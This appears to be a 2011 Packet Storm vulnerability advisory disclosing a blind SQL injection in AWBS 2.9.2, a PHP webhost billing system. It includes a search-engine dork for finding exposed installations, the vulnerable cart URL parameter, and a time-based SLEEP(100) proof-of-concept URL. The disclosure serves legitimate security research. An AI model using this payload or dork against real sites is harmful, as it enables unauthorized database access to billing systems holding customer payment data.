Lucene search

K
packetstormShivXPACKETSTORM:97613
HistoryJan 17, 2011 - 12:00 a.m.

AWBS 2.9.2 Blind SQL Injection

2011-01-1700:00:00
ShivX
packetstormsecurity.com
22
`AWBS 2.9.2 Blind SQL Injection 0day  
=============================================================================================  
Dork....: inurl:/cart?ca=add_other&oid=  
Date....: 01-16-2011  
Author..: ShivX  
Contact.: shivanx[at]gmail[dot]com  
Vendor..: http://www.awbs.com  
Link....: http://www.awbs.com/packages.php?spt=10 (or demo site)  
Version.: 2.9.2 (Possibly <=)  
Tested..: RedHat EL 5.6 (Tikanga)  
CVE.....: N/A (0day)  
=============================================================================================  
---Introduction---  
  
Advanced Webhost Billing System (AWBS) is webhosting billpay software written in PHP.  
AWBS includes a complete frontend written in XHTML/CSS. This frontend can be used as your  
website or in portal mode as a separate client portal and allows for full customization of  
its look.  
  
AWBS will communicate to your configured payment gateway(s) to perform live payments while  
customers place orders. Once orders are placed, AWBS will then communicate to your configured  
registrar, hosting server or reseller hosting account to complete the orders automatically,  
then send your configured email(s) to the client(s).  
  
AWBS will:  
- Generate invoices and email your clients notifying them a payment is due.  
- Automatically charge account balance or credit card on file on the invoice's due date.  
- Notify clients if the credit card on file is expired or declined.  
- Send domain renewal notices and automatically renew domains.  
- Suspend or unsuspend hosting accounts when a payment is not made or paid.  
  
The AWBS backend (admin interface) provides you with a quick and easy 'check in' homepage so  
you can find new orders, helpdesk tickets, contact form submissions, affiliate signups,  
overdue invoices, errors that may have occurred, and basic sales stats.  
=============================================================================================  
---Vulnerability---  
  
http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]  
=============================================================================================  
---PoC Using Time-Based Blind SQL Injection---  
  
https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='  
  
  
`